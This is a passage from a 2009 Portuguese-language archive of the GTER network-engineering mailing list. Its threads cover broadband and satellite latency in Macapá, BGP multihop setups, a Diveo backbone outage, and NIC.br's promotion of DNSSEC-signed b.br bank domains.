http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas > ) > > As operadoras de telefonia do estado do Amap? n?o t?m interesse em trazer a > t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus lucros > locais (com o acesso discado e com os altos pre?os de vendas de links > dedicados para governo e ISPs). E necessitaria de um investimento muito > alto > para funcionar internamente. > > Apenas trazer a fibra nao resolveria o problema local, ja que nao tem > infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? Redes > sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na > privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de se > instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente > anal?gico e tem sua troca invi?vel. > > Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a falta de > um backbone terrestre que nos interligue com o restante do brasil com > lat?ncias adequadas. > > Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por > culpa > do acesso satelital. > > Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos > comprar links dedicados por valores menores e repassar isso para os > consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de > imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender > seus > clientes com melhores qualidades. > > Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas > local. Passou para o sat?lite a m?gina p?ra. > > E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o monop?lio > continuar?(ria) existindo sem garantias de menores pre?os para os clientes > (que ? o que importa no final das contas). > > A salva??o, que todo mundo espera, al?m de governo, iniciativa privada e > consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, juntamente > com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica > para > libertar o povo amapaense desse desespero "desconectado". O problema n?mero > 2 ?: quem ir? explorar esse meio f?sico? > > PS: Pe?o desculpas ao amigo "Max The Tor" pelo meu e-mail anterior ter sido > menos "burocr?tico" e explicativo. > > > Atenciosamente, > > Wenderson Souza > e-mail: wendersonsouza at gmail.com > msn: wendersonsouza at msn.com > > > 2009/6/8 mantunes > > > Olha, > > > > tenho um amigo que trabalha na capital > > > > segundo informa??es dele.. > > > > N?o tem banda larga em Macap?. > > N?o tem rede 3g > > a sa?da ? somente via sat?lite o delay ? de 7milisegundos > > tem Telemar e Oi e provedores via r?dio.. > > > > > > 2009/6/8 max _tor : > > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de > > como > > > esta > > > o acesso por essa cidade/estado?? > > > Quem atende? OI/Embratel? outra? > > > Servico precario? bom? > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From marcmc.gter at gmail.com Wed Jun 10 01:24:52 2009 From: marcmc.gter at gmail.com (Marcelo Cavalcante) Date: Wed, 10 Jun 2009 01:24:52 -0300 Subject: [GTER] LAN GATEWAY Message-ID: <78a5befe0906092124l12f7920bhc1809353b47ea113@mail.gmail.com> Pessoal, H? arquiteturas de redes que incluem um equipamento chamado de LAN GATEWAY. N?o vi na internet alguma explica??o clara e did?tica sobre as fun??es desse tipo de equipamento. Algu?m aqui j? usou isso? Qual a aplica??o pr?tica e vantagens? Obrigado pela aten??o, Marcelo Cavalcante From Bruno at openline.com.br Wed Jun 10 07:56:50 2009 From: Bruno at openline.com.br (Bruno at openline.com.br) Date: Wed, 10 Jun 2009 07:56:50 -0300 Subject: [GTER] Cisco 1721 em Bridge Message-ID: <1244631410583.Bruno@openline.com.br> --- Rosauro - RLINE escreveu: > eu tenho um link por fibra fazendo BGP em um mikrotik. ai no mesmo local > tenho um link ainda de 4MB. que esta instalado em um cisco 1721. e > gostaria de ativar o BGP neste link tb. mas ai precisaria encontrar uma > forma de repassar ao mikrotik, para o mikrotik poder fechar a sessao > bgp, que passa por este cisco 1721. ola mas a operadora ? a mesma ou s?o 2 independentes? o que voc? procura ? o BGP multihop !3runo Cabral From Bruno at Openline.com.br Wed Jun 10 08:32:36 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Wed, 10 Jun 2009 08:32:36 -0300 Subject: [GTER] LAN GATEWAY Message-ID: <1244633556168.Bruno@Openline.com.br> --- Marcelo Cavalcante escreveu: > H? arquiteturas de redes que incluem um equipamento chamado de LAN GATEWAY. > N?o vi na internet alguma explica??o clara e did?tica sobre as fun??es desse > tipo de equipamento. Algu?m aqui j? usou isso? Qual a aplica??o pr?tica e > vantagens? "saida da rede"? tipo um roteador ou uplink para outra(s) rede(s) (como a internet)? > Obrigado pela aten??o, > Marcelo Cavalcante []s, !3runo Cabral From mpugliese at diveo.net.br Wed Jun 10 08:52:58 2009 From: mpugliese at diveo.net.br (Murilo Antonio Pugliese) Date: Wed, 10 Jun 2009 08:52:58 -0300 Subject: [GTER] RES: Cisco 1721 em Bridge In-Reply-To: <4A2EB4B7.5010807@rline.com.br> References: <4A2E9DAE.2020108@rline.com.br> <4A2EB4B7.5010807@rline.com.br> Message-ID: <22BCD418E4DBD340A574EDB311C743E003A1A0A4@mailit433.corp.diveo.net.br> Rosauro. Peguei o trem andando ent?o n?o estou bem certo se compreendi o cen?rio. Mas se o que voc? deseja ? que seu mikrotik estabele?a um segundo peering e-BGP com um neighbor n?o diretamente conectado, basta configurar o peering como "ebgp-multihop" com um valor adequado, e garantir (via IGP ou rota est?tica) conectividade entre os IPs referenciados no estabelecimento deste peering. Bom, se n?o era bem essa sua duvida, desculpe pelo e-mail desnecess?rio. At. MP. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Rosauro - RLINE Enviada em: ter?a-feira, 9 de junho de 2009 16:15 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] Cisco 1721 em Bridge Entao deixa eu explicar melhor. eu tenho um link por fibra fazendo BGP em um mikrotik. ai no mesmo local tenho um link ainda de 4MB. que esta instalado em um cisco 1721. e gostaria de ativar o BGP neste link tb. mas ai precisaria encontrar uma forma de repassar ao mikrotik, para o mikrotik poder fechar a sessao bgp, que passa por este cisco 1721. Atenciosamente, Rosauro Baretta Itamar Reis Peixoto escreveu: > a sua pergunta n?o ficou clara, mas creio que um bgp multi-hope > resolva seu problema. > > > 2009/6/9 Rosauro - RLINE : > >> Pessoal, >> >> estou precisando colocar junto no meu roteador BGP um link menor de 4MB que >> possuo, e ele chega pra mim por "par metalico" e vai at? o meu roteador que >> ? um cisco 1721, seria poss?vel eu colocar este roteador em bridge para >> poder passar o BGP para o meu roteador ? >> >> Atenciosamente, >> >> Rosauro Baretta >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > -- gter list https://eng.registro.br/mailman/listinfo/gter From security at neogrid.com Wed Jun 10 11:01:28 2009 From: security at neogrid.com (NOC NeoGrid) Date: Wed, 10 Jun 2009 11:01:28 -0300 Subject: [GTER] Diveo com problemas? Message-ID: Bom dia! Mais algu?m com problemas com links da Diveo? Att, Dilson. From wederson at vipvilhena.com.br Wed Jun 10 09:33:09 2009 From: wederson at vipvilhena.com.br (Wederson Rodrigues) Date: Wed, 10 Jun 2009 08:33:09 -0400 Subject: [GTER] Cisco 1721 em Bridge In-Reply-To: <1244631410583.Bruno@openline.com.br> References: <1244631410583.Bruno@openline.com.br> Message-ID: <8ea12dee0906100533g7b1480d4vfe2231b7ef2355cb@mail.gmail.com> Sauda??es, Meu cen?rio aqui ? o seguinte: Dois links, cada qual em um Roteador e atras deles uma maquina linux com Quagga(BGP). Ou seja, apenas bgp-multhop. 2009/6/10 Bruno at openline.com.br > --- Rosauro - RLINE escreveu: > > eu tenho um link por fibra fazendo BGP em um mikrotik. ai no mesmo local > > tenho um link ainda de 4MB. que esta instalado em um cisco 1721. e > > gostaria de ativar o BGP neste link tb. mas ai precisaria encontrar uma > > forma de repassar ao mikrotik, para o mikrotik poder fechar a sessao > > bgp, que passa por este cisco 1721. > > ola > > mas a operadora ? a mesma ou s?o 2 independentes? > > o que voc? procura ? o BGP multihop > > !3runo Cabral > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- []'s ----------------------------------------- .'. Wederson Rodrigues .'. (CeBoLaRk) VIP - Vilhena Internet Provider Gerente de T.I. http://www.vipvilhena.com.br MSN: cebolark at hotmail.com SKYPE: cebolark EMAIL: wederson at vipvilhena.com.br Celular: 0xx69 8124-4697 ----------------------------------------- From guhcampos at gmail.com Wed Jun 10 09:34:06 2009 From: guhcampos at gmail.com (Gustavo Campos) Date: Wed, 10 Jun 2009 09:34:06 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> Message-ID: <19834d100906100534r64c3ea6bo9b675070d903dc67@mail.gmail.com> S? uma d?vida relacionada. Algu?m sabe como que a RNP chega ao Amap?? 2009/6/9 max _tor : > Wenderson, tranquilo, agradeco por ter respondido. > > Com relacao ao grupo de empresario, nao entendi porque Belem, > cidade com melhor investimento de backbone mais proxima? > ou simplesmente unica alternativa? > > Olha Wenderson, conhecendo as historias do Carlos Slim ( > http://pt.wikipedia.org/wiki/Carlos_Slim_Hel%C3%BA ) , > fico meio em duvida com relacao ao seu comentario das operadoras, que nao > querem > investir mais para nao baixarem os precos, aposto mais em viabilidades > tecnicas > e quando fala em viabilidade, falo em $$, imagino que o investimento seja > tao > alto que so daria certo se grandes operadores se unisessem, que nao e comum, > so quando se compram :) , mas tambem e o que acho, nao sao certezas. > > Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em > voip > correto? > Com relacao a ultima milha, acho que e um processo relativo, a medida > que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, > ADSL, isso ja seria questao de tempo. > > Acho tambem, que se um grupo forte ou um empresario independente, fizer o > investimento > entregando nao so internet, mas telefonia fixa e outros servicos para o > mercado empresarial , logo nao se ganhara dinheiro com acesso a internet, > alguma ou todas grande investira tambem, gerando concorrencia e aquecimento > no mercado local, portanto nao vejo como salvacao mas como aceleracao. > > > Mas sao apenas duvidas e discussoes correto ? > > Abracos > > > 2009/6/8 Wenderson Souza > >> Boa noite, >> >> Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho grande >> respeito pelo seu grande conhecimento nesta ?rea de Internet entre outras, >> existe sim este grupo de empres?rios que est? com o projeto de trazer de >> Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu conhecimento) >> internet com velocidades maiores e/ou lat?ncias menores, trazendo assim a >> t?o "esperada" banda larga. >> >> Apesar de (tecnicamente falando) Macap? j? ter banda larga ( >> http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o que >> trafega acima dos 56kbps do modem discado, j? pode-se considerar banda >> larga. S? que as velocidades vistas nas capitais que s?o atendidas por >> backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do link >> satelital ser muito alto. >> >> Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o >> custo? >> Custo alto por usar backbone satelital. Seria o mesmo que aconteceria em >> Macap?. ( >> >> http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas >> ) >> >> As operadoras de telefonia do estado do Amap? n?o t?m interesse em trazer a >> t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus lucros >> locais (com o acesso discado e com os altos pre?os de vendas de links >> dedicados para governo e ISPs). E necessitaria de um investimento muito >> alto >> para funcionar internamente. >> >> Apenas trazer a fibra nao resolveria o problema local, ja que nao tem >> infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? Redes >> sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na >> privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de se >> instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente >> anal?gico e tem sua troca invi?vel. >> >> Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a falta de >> um backbone terrestre que nos interligue com o restante do brasil com >> lat?ncias adequadas. >> >> Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por >> culpa >> do acesso satelital. >> >> Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos >> comprar links dedicados por valores menores e repassar isso para os >> consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de >> imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender >> seus >> clientes com melhores qualidades. >> >> Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas >> local. Passou para o sat?lite a m?gina p?ra. >> >> E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o monop?lio >> continuar?(ria) existindo sem garantias de menores pre?os para os clientes >> (que ? o que importa no final das contas). >> >> A salva??o, que todo mundo espera, al?m de governo, iniciativa privada e >> consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, juntamente >> com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica >> para >> libertar o povo amapaense desse desespero "desconectado". O problema n?mero >> 2 ?: quem ir? explorar esse meio f?sico? >> >> PS: Pe?o desculpas ao amigo "Max The Tor" pelo meu e-mail anterior ter sido >> menos "burocr?tico" e explicativo. >> >> >> Atenciosamente, >> >> Wenderson Souza >> e-mail: wendersonsouza at gmail.com >> msn: wendersonsouza at msn.com >> >> >> 2009/6/8 mantunes >> >> > Olha, >> > >> > tenho um amigo que trabalha na capital >> > >> > segundo informa??es dele.. >> > >> > N?o tem banda larga em Macap?. >> > N?o tem rede 3g >> > a sa?da ? somente via sat?lite ?o delay ? de 7milisegundos >> > tem Telemar e Oi e provedores via r?dio.. >> > >> > >> > 2009/6/8 max _tor : >> > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia de >> > como >> > > esta >> > > o acesso por essa cidade/estado?? >> > > Quem atende? OI/Embratel? outra? >> > > Servico precario? bom? >> > >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > -- -- Gustavo Campos Sistemas de Informa??o - UFMG From psi666 at gmail.com Wed Jun 10 11:08:46 2009 From: psi666 at gmail.com (Ricardo Guimaraes) Date: Wed, 10 Jun 2009 11:08:46 -0300 Subject: [GTER] Diveo com problemas? In-Reply-To: References: Message-ID: Estamos com dois links da Diveo fora neste momento. SP, regi?o da Vila Ol?mpia. On Wed, Jun 10, 2009 at 11:01 AM, NOC NeoGrid wrote: > Bom dia! > > Mais algu?m com problemas com links da Diveo? > > Att, > > Dilson. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- []'s Ricardo A. Guimar?es From aquino at ecosistemas.com.br Wed Jun 10 11:22:19 2009 From: aquino at ecosistemas.com.br (Lucio de Aquino Marinho) Date: Wed, 10 Jun 2009 11:22:19 -0300 Subject: [GTER] Diveo com problemas? In-Reply-To: References: Message-ID: <4A2FC19B.8050605@ecosistemas.com.br> Opa , sim , Ta estranho , consigo chegar la via Oi mas nao sai para lugar nenhum NOC NeoGrid escreveu: > Bom dia! > > Mais algu?m com problemas com links da Diveo? > > Att, > > Dilson. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From roney at ntc.net.br Wed Jun 10 11:21:07 2009 From: roney at ntc.net.br (=?utf-8?B?UsO0bmV5IEVkdWFyZG8gLSBOVEM=?=) Date: Wed, 10 Jun 2009 11:21:07 -0300 (BRT) Subject: [GTER] Amapa/Macapa In-Reply-To: <19834d100906100534r64c3ea6bo9b675070d903dc67@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> <19834d100906100534r64c3ea6bo9b675070d903dc67@mail.gmail.com> Message-ID: <37404.200.142.58.19.1244643667.squirrel@webmail.ntc.net.br> Sat?lite, pela Embratel. 4 Mbits de link. []'s R?ney Eduardo > S? uma d?vida relacionada. > > Algu?m sabe como que a RNP chega ao Amap?? > > 2009/6/9 max _tor : >> Wenderson, tranquilo, agradeco por ter respondido. >> >> Com relacao ao grupo de empresario, nao entendi porque Belem, >> cidade com melhor investimento de backbone mais proxima? >> ou simplesmente unica alternativa? >> >> Olha Wenderson, conhecendo as historias do Carlos Slim ( >> http://pt.wikipedia.org/wiki/Carlos_Slim_Hel%C3%BA ) , >> fico meio em duvida com relacao ao seu comentario das operadoras, que >> nao >> querem >> investir mais para nao baixarem os precos, aposto mais em viabilidades >> tecnicas >> e quando fala em viabilidade, falo em $$, imagino que o investimento >> seja >> tao >> alto que so daria certo se grandes operadores se unisessem, que nao e >> comum, >> so quando se compram :) , mas tambem e o que acho, nao sao certezas. >> >> Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar em >> voip >> correto? >> Com relacao a ultima milha, acho que e um processo relativo, a medida >> que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, >> ADSL, isso ja seria questao de tempo. >> >> Acho tambem, que se um grupo forte ou um empresario independente, fizer >> o >> investimento >> entregando nao so internet, mas telefonia fixa e outros servicos para o >> mercado empresarial , logo nao se ganhara dinheiro com acesso a >> internet, >> alguma ou todas grande investira tambem, gerando concorrencia e >> aquecimento >> no mercado local, portanto nao vejo como salvacao mas como aceleracao. >> >> >> Mas sao apenas duvidas e discussoes correto ? >> >> Abracos >> >> >> 2009/6/8 Wenderson Souza >> >>> Boa noite, >>> >>> Conforme dito pelo colega Mayk, o qual conhe?o pessoalmente e tenho >>> grande >>> respeito pelo seu grande conhecimento nesta ?rea de Internet entre >>> outras, >>> existe sim este grupo de empres?rios que est? com o projeto de trazer >>> de >>> Bel?m para Macap? atrav?s da tecnologia a r?dio (segundo meu >>> conhecimento) >>> internet com velocidades maiores e/ou lat?ncias menores, trazendo assim >>> a >>> t?o "esperada" banda larga. >>> >>> Apesar de (tecnicamente falando) Macap? j? ter banda larga ( >>> http://pt.wikipedia.org/wiki/Banda_larga), visto que qualquer conex?o >>> que >>> trafega acima dos 56kbps do modem discado, j? pode-se considerar banda >>> larga. S? que as velocidades vistas nas capitais que s?o atendidas por >>> backbones em fibra ?ptica n?o s?o tang?veis em Macap? pelo custo do >>> link >>> satelital ser muito alto. >>> >>> Querem um exemplo, Manaus, tem banda larga pelo Velox, mas j? viram o >>> custo? >>> Custo alto por usar backbone satelital. Seria o mesmo que aconteceria >>> em >>> Macap?. ( >>> >>> http://oivelox.novaoi.com.br/portal/site/OiVelox/menuitem.ebeac1048536fb0248de9f76f26d02a0/?vgnextoid=c0456b009fcf2110VgnVCM10000090cb200aRCRD&STATE=3|AM|Amazonas >>> ) >>> >>> As operadoras de telefonia do estado do Amap? n?o t?m interesse em >>> trazer a >>> t?o esperada fibra ?ptica para Macap?, porque isso diminuiria seus >>> lucros >>> locais (com o acesso discado e com os altos pre?os de vendas de links >>> dedicados para governo e ISPs). E necessitaria de um investimento muito >>> alto >>> para funcionar internamente. >>> >>> Apenas trazer a fibra nao resolveria o problema local, ja que nao tem >>> infra-estrutura interna necess?ria para instalar redes xDSL. Motivo? >>> Redes >>> sucateadas, anal?gicas (as mesmas recebidas do sistema Telebr?s na >>> privatiza??o), amplificadas. Apenas alguns bairros t?m URAs capazes de >>> se >>> instalar um DSLAM e fazer o neg?cio acontecer. O restante ? totalmente >>> anal?gico e tem sua troca invi?vel. >>> >>> Assim como o Mayk trabalho em ISP e nossa cidade sofre muito com a >>> falta de >>> um backbone terrestre que nos interligue com o restante do brasil com >>> lat?ncias adequadas. >>> >>> Hoje nossa lat?ncia m?nima em Macap? ? entre 550 ms a 600 ms, isso por >>> culpa >>> do acesso satelital. >>> >>> Ent?o a fibra nao resolveria? Sim e n?o, pois vindo a fibra poder?amos >>> comprar links dedicados por valores menores e repassar isso para os >>> consumidores. Velocidades maiores por pre?os menores. Mas nao teria (de >>> imediato) o ADSL dispon?vel. Mas os ISPs via r?dio conseguiriam atender >>> seus >>> clientes com melhores qualidades. >>> >>> Rede 3G existe em Macap?, mas apenas internamente. V?deo-chamada apenas >>> local. Passou para o sat?lite a m?gina p?ra. >>> >>> E aquele grupo de empres?rios ser? a salva??o? Sim e n?o, pois o >>> monop?lio >>> continuar?(ria) existindo sem garantias de menores pre?os para os >>> clientes >>> (que ? o que importa no final das contas). >>> >>> A salva??o, que todo mundo espera, al?m de governo, iniciativa privada >>> e >>> consumidores, ? mesmo a chegada do linh?o de Tucuru? em Macap?, >>> juntamente >>> com o mesmo vir? (segundo cl?usula licitat?ria) "cabos" de fibra ?ptica >>> para >>> libertar o povo amapaense desse desespero "desconectado". O problema >>> n?mero >>> 2 ?: quem ir? explorar esse meio f?sico? >>> >>> PS: Pe?o desculpas ao amigo "Max The Tor" pelo meu e-mail anterior ter >>> sido >>> menos "burocr?tico" e explicativo. >>> >>> >>> Atenciosamente, >>> >>> Wenderson Souza >>> e-mail: wendersonsouza at gmail.com >>> msn: wendersonsouza at msn.com >>> >>> >>> 2009/6/8 mantunes >>> >>> > Olha, >>> > >>> > tenho um amigo que trabalha na capital >>> > >>> > segundo informa??es dele.. >>> > >>> > N?o tem banda larga em Macap?. >>> > N?o tem rede 3g >>> > a sa?da ? somente via sat?lite ?o delay ? de 7milisegundos >>> > tem Telemar e Oi e provedores via r?dio.. >>> > >>> > >>> > 2009/6/8 max _tor : >>> > > Senhores, alguem na lista de amapa/macapa, que possa dar referencia >>> de >>> > como >>> > > esta >>> > > o acesso por essa cidade/estado?? >>> > > Quem atende? OI/Embratel? outra? >>> > > Servico precario? bom? >>> > >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > > > > -- > -- > Gustavo Campos > Sistemas de Informa??o - UFMG > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From frederick at dahype.org Wed Jun 10 11:28:19 2009 From: frederick at dahype.org (Renato Frederick) Date: Wed, 10 Jun 2009 10:28:19 -0400 Subject: [GTER] RES: Diveo com problemas? In-Reply-To: <4A2FC19B.8050605@ecosistemas.com.br> References: <4A2FC19B.8050605@ecosistemas.com.br> Message-ID: Acabei de atender chamado, sim est?o com problemas no backbone! > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Lucio de Aquino Marinho > Enviada em: quarta-feira, 10 de junho de 2009 11:22 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] Diveo com problemas? > > Opa , sim , > > Ta estranho , consigo chegar la via Oi mas nao sai para lugar > nenhum > > > > NOC NeoGrid escreveu: > > Bom dia! > > > > Mais algu?m com problemas com links da Diveo? > > > > Att, > > > > Dilson. > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From security at neogrid.com Wed Jun 10 13:40:13 2009 From: security at neogrid.com (NOC NeoGrid) Date: Wed, 10 Jun 2009 13:40:13 -0300 Subject: [GTER] RES: Diveo com problemas? In-Reply-To: References: Message-ID: Obrigado pelas respostas! O acesso j? voltou ao normal. Att, Dilson. -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de NOC NeoGrid Enviada em: quarta-feira, 10 de junho de 2009 11:01 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: [GTER] Diveo com problemas? Bom dia! Mais algu?m com problemas com links da Diveo? Att, Dilson. -- gter list https://eng.registro.br/mailman/listinfo/gter From demi at nic.br Wed Jun 10 15:44:44 2009 From: demi at nic.br (Demi Getschko) Date: Wed, 10 Jun 2009 15:44:44 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A2FC19B.8050605@ecosistemas.com.br> References: <4A2FC19B.8050605@ecosistemas.com.br> Message-ID: <4A2FFF1C.1010409@nic.br> Prezados Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como dificilmente veremos campanha de marquetim falando nisso (at? pelos valores investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do banco com o b.br, sempre que ele existir... Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem alfab?tica. A lista dos dom?nios completa est? em: http://www.nic.br/atividades/dom-bbr.htm *Banco Alfa S/A Banco BBM S/A Banco Bonsucesso S/A Banco Bradesco S/A Banco Bradesco BBI S/A Banco BVA S/A Banco Cooperativo Sicredi S/A - BANSICREDI Banco do Brasil S/A Banco do Estado do Par? S/A Banco Ita? S/A Banco do Nordeste do Brasil S/A Banco Industrial e Comercial S/A Banco Panamericano S/A Banco Prosper S/A Banco Safra S/A Banco Schahin S/A Banco Triangulo S/A Banco Votorantim S/A Banrisul - Banco do Estado do Rio Grande do Sul Caixa Econ?mica Federal Paran? Banco S/A Unibanco * alfa.b.br alfanet.b.br bancoalfa.b.br bahiabank.b.br bancobbm.b.br bbmbank.b.br bbminvestimentos.b.br bancobonsucesso.b.br bradesco.b.br todasasrazoes.b.br bancobradesco.b.br bradescobbi.b.br bradescocambio.b.br bradescocartoes.b.br bradescocomercioeletronico.b.br bradescocorporate.b.br bradescoempresas.b.br bradescopessoajuridica.b.br bradescoprime.b.br bradescoprivate.b.br bradescori.b.br bradescouniversitarios.b.br bradescoseguranca.b.br bradescopoderpublico.b.br bradesconikkei.b.br bancodoplaneta.b.br bradescorural.b.br bancoalvorada.b.br bancobcn.b.br bancobbi.b.br bancofinasa.b.br bbi.b.br bcn.b.br bancobmc.b.br bankpar.b.br bancoboavista.b.br bancofinasabmc.b.br boavista.b.br bancobradescobbi.b.br bmc.b.br bancobankpar.b.br baneb.b.br bradescosaude.b.br bradescoseguros.b.br 2000e9.b.br 2000e9bradesco.b.br 2000enove.b.br 2000enovebradesco.b.br 2000i9.b.br 2000i9bradesco.b.br 2000inove.b.br 2000inovebradesco.b.br bradesco2000e9.b.br bradesco2000enove.b.br bradesco2000i9.b.br bradesco2000inove.b.br bradescodoismilenove.b.br bradescodoismilinove.b.br bradescoinove.b.br doismilenovebradesco.b.br doismilinovebradesco.b.br bradescomediacenter.b.br bradescopocket.b.br bradescovidaeprevidencia.b.br clickconta.b.b corporatebradesco.b.br fb.b.br shopcredit.b.br shopfacil.b.br shopinvest.b.br alvorada.b.br bradescocapitalizacao.b.br bradescocelular.b.br bradescoimoveis.b.br bradescocustodia.b.br bradescoconsorcio.b.br bradescoprevidencia.b.br bradespar.b.br finasaesportes.b.br cidadetran.b.br finasa.b.br economiaemdia.b.br bradesconetexpress.b.br bradescorsa.b.br bancobci.b.br bancobva.b.br bancoconceito.b.br bancomultiner.b.br bancosolidez.b.br bancovalor.b.br bancovetor.b.br bancovitoria.b.br bvadireto.b.br cdbmais.b.br cdbseguro.b.br descontonline.b.br finameexpress.b.br finamexpress.b.br fixseguro.b.br moneyshopping.b.br multiaplic.b.br multicdb.b.br multicredito.b.br ndigi.b.br negociosdigitais.b.br pegcred.b.br pegcredito.b.br peguecred.b.br peguecredito.b.br sicredi.b.br bancobrasil.b.br bancodobrasil.b.br bb.b.br banparanet.b.br itau.b.br bnb.b.br bicbanco.b.br bancopanamericano.b.br panamericano.b.br bancoprosper.b.br prosper.b.br safra.b.br schahin.b.br bancoschahin.b.br bancotriangulo.b.br tribanco.b.br tribanconline.b.br tribancoonline.b.br bancovotorantim.b.br banrisul.b.br bankingcaixa.b.br caixaeconomica.b.br caixaeconomicafederal.b.br cef.b.br fgts.b.br caixa.b.br paranabanco.b.br From emiliano.martins at ik1.com.br Wed Jun 10 15:55:45 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Wed, 10 Jun 2009 15:55:45 -0300 Subject: [GTER] b.br - meio "off topic"... In-Reply-To: <4A2FFF1C.1010409@nic.br> References: <4A2FC19B.8050605@ecosistemas.com.br> <4A2FFF1C.1010409@nic.br> Message-ID: <9c0c824e0906101155l6d4b5981w869b69225a4b4d06@mail.gmail.com> Demi, Desculpe minha ignor?ncia, mas qual a vantagem em se usar o b.br ao inves do com.br? 2009/6/10 Demi Getschko > Prezados > > Temos o b.br no ar h? quase um ano e diversos bancos registraram l? seus > dom?nios... Alguns quando acessados via b.br redirecionam para .com.br e > outros est?o no b.br de forma "nativa". Claro que n?o basta o DNS do banco > assinar: a cadeia toda deveria verificar isso, mas j? ? um come?o. E como > dificilmente veremos campanha de marquetim falando nisso (at? pelos valores > investidos na divulga??o do com.br), uma id?ia ? come?armos uma divulga??o > "viral", usando e estimulando o uso dos s?tios b.br. A proposta, ent?o, ? > a ajuda dos colegas para irmos lentamente nos acostumando a ir ao s?tio do > banco com o b.br, sempre que ele existir... > Que pensam disso? Segue a lista dos que hoje est?o assinados, em ordem > alfab?tica. A lista dos dom?nios completa est? em: > http://www.nic.br/atividades/dom-bbr.htm > > *Banco Alfa S/A > Banco BBM S/A > Banco Bonsucesso S/A > Banco Bradesco S/A > Banco Bradesco BBI S/A > Banco BVA S/A > Banco Cooperativo Sicredi S/A - BANSICREDI > Banco do Brasil S/A > Banco do Estado do Par? S/A > Banco Ita? S/A > Banco 